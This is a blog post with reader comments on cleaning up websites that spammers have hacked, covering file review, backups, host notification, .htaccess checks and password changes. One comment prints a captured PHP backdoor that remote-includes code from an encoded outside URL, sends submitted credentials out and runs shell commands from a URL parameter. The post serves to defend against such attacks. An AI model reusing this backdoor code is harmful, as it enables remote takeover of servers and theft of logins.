Fixing hacked sites
There’s been a lot of hacked sites lately. Sites hacked by or for spammers, who use other people’s websites to serve up their spammy content.
The websites may have been hacked using many different techniques, so I won’t get into ways they could have been hacked here.
However, I’ll cover what you need to do. Maybe others can think of other things you shoul do as well (comments).
First of all, look over the site. Look for php files that shouldn’t be there. It’s helpful to have a fairly recent backup to compare with. Download and save (via ftp or a control panel or file explorer) the php files you don’t recegnize. I’d love to see samples of the php files too, in order to track the spammers through the code, if you’re OK with that.
Notify your webhost. Ask them if maybe the hackers has used a hack that compromised other websites. Some hacks are “per site”, others are per server.
There are different techniques used by spammers when they hack sites. Some use php files, some use ordinary html files. Download and save any files uploaded by spammers, then remove them. Also be aware that one site owner reported that the spammers had deleted several thousand images to have room for their spammy files.
Erase ALL files from the website, if possible. If not, remove the files you don’t recognize. Reload files from a backup. Leave the databases as is. We haven’t seen any cases of altered databases so far. If you use php scripts on your site, be sure to upgrade to the newest version while restoring the site. Old php scripts may have gotten you hacked. Also review any problematic security settings on your host, pertaining to your scripts.
Check the .htaccess file for code that shouldn’t be there. Here’s one example for reference.
Change all passwords.
Download raw logs and store if possible.
Here’s an example that showed up on a Hosting Matters server, a couple of months ago. The filename is “common.php”, but there were hundreds of these, named things like “date.php” and “time.php”.
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth=”&l=”. base64_encode($_POST["l"]) .”&p=”. base64_encode(md5($_POST["p"]));}
else{$user_auth=”&l=”. $_POST["l"] .”&p=”. $_POST["p"];}
}else{$user_auth=”";}
if(!isset($_POST["log_flg"])){$log_flg=”&log”;}
if(! @include_once(base64_decode(”aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9″) . sprintf(”%u”, ip2long(getenv(REMOTE_ADDR))) .”&url=”. base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]==”special”){print ”sys_active”. `uname -a`;}
}
?>
(it decodes to something.ru, I can’t remember. Anyway, been following your blog on and off for a while, you do good work, Spamhuntress!)
girl u dobt know what you r talking about. have u heard about XSS?
how about MySQL Injection.
“We haven’t seen any cases of altered databases so far.”
I did and used to do it.
XSS or MySQL Injection are ways to insert bad code into a database, but this post is talking about what things are commonly affected when your server is compromised based on recent attacks. It appears databases are not being attacked in this way so far. But I would still much prefer to restore a backup of the database if possible.
Read this horror story about an entire Large firm’s Website being Hacked and Banned without them even knowing about it
seroundtable.com/archives/006534.html
if you look at the screenshot on the Google SERPs archive - you will notice many (dot)DHTML extensions
Does anyone think this could have been done by competitors - is this a trend?
HEY MY BUDDY HIS SITE GOT HACKED AND ALL OF THE FORUMS ARE GONE IS THERE ANYWAY TO GET THAT BACK AND TO CATCH THE HACKERS
Vilandas: Most forums have databases that hold the actual posts. So if the database is intact, then he can get the forums back. The first thing you do is try to back up the forum. Then clean up the mess left by the hackers, and figure out how they got in. Finally install a new version of the forum (up to date software has less vulnerabilities). He’ll need the password for the forum and a few other details. If he doesn’t have that, he’d need to ask the webhost for help in getting a new password.